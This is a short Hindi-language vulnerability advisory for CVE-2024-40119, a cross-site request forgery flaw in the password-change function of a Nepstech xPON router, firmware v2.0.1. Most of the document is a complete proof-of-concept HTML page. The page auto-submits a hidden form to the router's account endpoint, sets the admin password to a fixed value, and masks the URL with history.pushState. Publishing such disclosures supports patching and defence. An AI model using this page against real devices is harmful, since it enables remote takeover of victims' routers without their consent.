
पासवर्ड बदलने के फ़ंक्शन में क्रॉस-साइट रिक्वेस्ट फॉरजरी (CSRF) कमज़ोरी, जो दूरस्थ हमलावरों को उपयोगकर्ता की सहमति के बिना एडमिन पासवर्ड बदलने की अनुमति देती है, जिससे संभावित खाता अधिग्रहण हो सकता है।
Subhodeep Baroi
CVE-2024-40119 एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता है जो Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 फर्मवेयर v2.0.1 में मौजूद है। यह भेद्यता दूरस्थ हमलावरों को उपयोगकर्ता की सहमति के बिना व्यवस्थापक पासवर्ड बदलने की अनुमति देती है, जिससे संभावित खाता अधिग्रहण होता है।
एक दूरस्थ हमलावर एक दुर्भावनापूर्ण HTML पृष्ठ तैयार कर सकता है जो किसी प्रमाणित उपयोगकर्ता द्वारा देखे जाने पर पासवर्ड बदलने की कार्यक्षमता को ट्रिगर करता है। नीचे एक नमूना हमला वेक्टर है:
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
<input type="hidden" name="name0" value="admin" />
<input type="hidden" name="name1" value="user" />
<input type="hidden" name="name2" value="user3" />
<input type="hidden" name="oldUsername" value="admin" />
<input type="hidden" name="newUsername" value="" />
<input type="hidden" name="oldPassword" value="" />
<input type="hidden" name="newPassword" value="UserUser2@" />
<input type="hidden" name="cfmPassword" value="UserUser2@" />
<input type="hidden" name="accountflg" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>